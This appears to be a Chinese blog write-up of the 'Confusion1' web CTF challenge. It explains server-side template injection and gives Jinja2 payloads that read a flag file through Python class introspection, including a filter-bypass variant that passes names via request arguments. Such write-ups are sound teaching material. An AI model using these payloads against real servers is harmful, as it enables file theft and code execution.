文章目录

  • 前言
  • 一、Confusion1
    • 1.题目
    • 2.答题

前言

SSTI漏洞(Server Side Template Injection,服务端模板注入漏洞)是一种 web 应用程序中的安全漏洞,它允许攻击者通过在模板中注入恶意代码,执行服务器端的任意代码。模板通常用于 web 应用程序中的动态内容生成,这些模板经常包含逻辑控制语句和变量插入。攻击者可以利用模板中缺乏输入验证和过滤来注入任意的代码,从而实现任意代码执行,甚至是远程命令执行。SSTI漏洞是一种危险性较高的漏洞,因为攻击者可以完全控制服务器端执行的代码和结果。

一、Confusion1

1.题目

2.答题


login.php中Ctrl+U查看页面源码发现flag路径


login.php{{1+3}}测试ssti漏洞

SSTI常用的注入

__class__() 返回对象的类
__base__()/__mro__() 返回类所继承的基类
__subclasses__() 返回继承类的所有子类

测试pyaload:

{{"".__class__.__mro__[2].__subclasses__()[40]("/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt").read()}}


发现被过滤了

参数替换payload:

{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?&a=__class__&b=__mro__&c=__subclasses__&d=read


得到flag:cyberpeace{8542f410d961a14be7aa7778e0f366a4}

【愚公系列】2023年05月 攻防世界-Web(Confusion1)相关推荐

  1. 【愚公系列】2023年05月 攻防世界-Web(lottery)

    文章目录 前言 一.lottery 1.题目 2.答题 前言 dirsearch是一个用于Web服务器的爬虫工具,它可以快速地扫描网站的目录,并找出隐藏的文件和目录.dirsearch可以检测出许多常 ...

  2. 【愚公系列】2023年05月 攻防世界-Web(unseping)

    文章目录 前言 一.unseping 1.题目 2.答题 前言 反序列化漏洞是一种安全漏洞,存在于那些使用序列化技术的应用程序中.反序列化是将已序列化数据还原回对象的过程.攻击者可以通过构造恶意序列化 ...

  3. 【愚公系列】2023年05月 攻防世界-Web(shrine)

    文章目录 前言 一.shrine 1.题目 2.答题 前言 Flask是一个轻量级的Web应用程序框架,用于Python编程语言.它是基于Werkzeug WSGI工具箱和Jinja2模板引擎构建的. ...

  4. 【愚公系列】2023年05月 攻防世界-Web(FlatScience)

    文章目录 前言 一.FlatScience 1.题目 2.答题 前言 Robots协议,也称作robots.txt,是一种在Web站点中告诉搜索引擎蜘蛛哪些页面可以被访问的协议.该协议规定了机器人在访 ...

  5. 【愚公系列】2023年05月 攻防世界-Web(file_include)

    文章目录 前言 1.文件包含漏洞 2.php伪协议 3.php包含漏洞函数 一.file_include 1.题目 2.答题 总结 前言 1.文件包含漏洞 文件包含漏洞(File Inclusion ...

  6. 【愚公系列】2023年05月 攻防世界-Web(Web_php_include)

    文章目录 前言 1.文件包含漏洞 2.php伪协议 3.php包含漏洞函数 一.Web_php_include 1.题目 2.答题 2.1 伪协议解题 2.2 中国蚁剑 2.3 数据库写入 前言 1. ...

  7. 【愚公系列】2023年05月 攻防世界-Web(fileclude)

    文章目录 前言 1.文件包含漏洞 2.php伪协议 一.fileclude 1.题目 2.答题 前言 1.文件包含漏洞 文件包含漏洞(File Inclusion Vulnerability)是一种常 ...

  8. 【愚公系列】2023年05月 攻防世界-Web(fileinclude)

    文章目录 前言 1.文件包含漏洞 2.php伪协议 一.fileinclude 1.题目 2.答题 前言 1.文件包含漏洞 文件包含漏洞(File Inclusion Vulnerability)是一 ...

  9. 【愚公系列】2023年05月 攻防世界-Web(Web_php_unserialize)

    文章目录 前言 一.Web_php_unserialize 1.题目 2.答题 前言 PHP的序列化漏洞是一种安全漏洞,攻击者可以利用这种漏洞来执行恶意代码或获取敏感信息.具体来说,攻击者可以通过在序 ...

最新文章

  1. python launcher怎么使用_QMUI实战(一)—为何我们要使用 LauncherActivity?
  2. 单链表-在带头结点的单链表L中删除一个最小值结点(四指针)
  3. python统计文件行数检测字符串_python统计文件中的字符串数目示例
  4. 浙江 徐崇峰 胜 杭州 郭凤达 2018年第五届“高港杯”象棋青年大师赛男子组
  5. mysql性能优化金字塔法则pdf_MySQL索引优化2-优化法则
  6. linux 文件按照大小排列
  7. Win7系统win键没有反应的应对措施
  8. c++ 全局变量_专业解码 | 带你了解Python全局变量与局部变量!
  9. opencv 调整图像亮度和对比度
  10. 技嘉linux支持的主板型号,详细解读主板厂商命名规则——技嘉篇
  11. 初学者-C语言基础练习(二)——C语言编译器的使用方法
  12. php开发工具ps,小蚂蚁学习PS切图之基础操作(2)——工具栏的介绍
  13. JDK8中String的intern()方法详细解读【内存图解+多种例子+1.1w字长文】
  14. 关于 mPaaS PB 接入模式适配 64 位 CPU 架构中项目报错解决方案
  15. 关于机械键盘的一些知识
  16. 根据身份证号码计算生日/年龄/性别
  17. 基本的计算机理论知识试题及答案,计算机的基础知识试题及答案
  18. Codeforces Round #775 (Div. 2) E.Tyler and Strings
  19. php模拟登录教学视频,php使用curl模拟登录人人(校内)网_PHP教程
  20. 金山网络-度过生死线

热门文章

  1. linux系统查看当前安装字库,Linux系统下安装和配置中文字库的方法
  2. 英国普利茅斯大学:量子计算机与脑机接口的“相生相克”
  3. php获取全国最新省市区行政区划数据
  4. 树的度、叶子节点相关计算问题
  5. 冒险岛登录服务器未响应,打开冒险岛,登陆角色后就黑屏了
  6. 2022胺基化工艺考试试题及答案
  7. (二)Linux嵌入式开发——软件安装(Ubuntu)
  8. STM32 固件库,CMSIS 标准,STM32Cube
  9. savefiles提供免费25G网盘,可外链图片、视频
  10. 一款基于ssd1306驱动的12864屏简介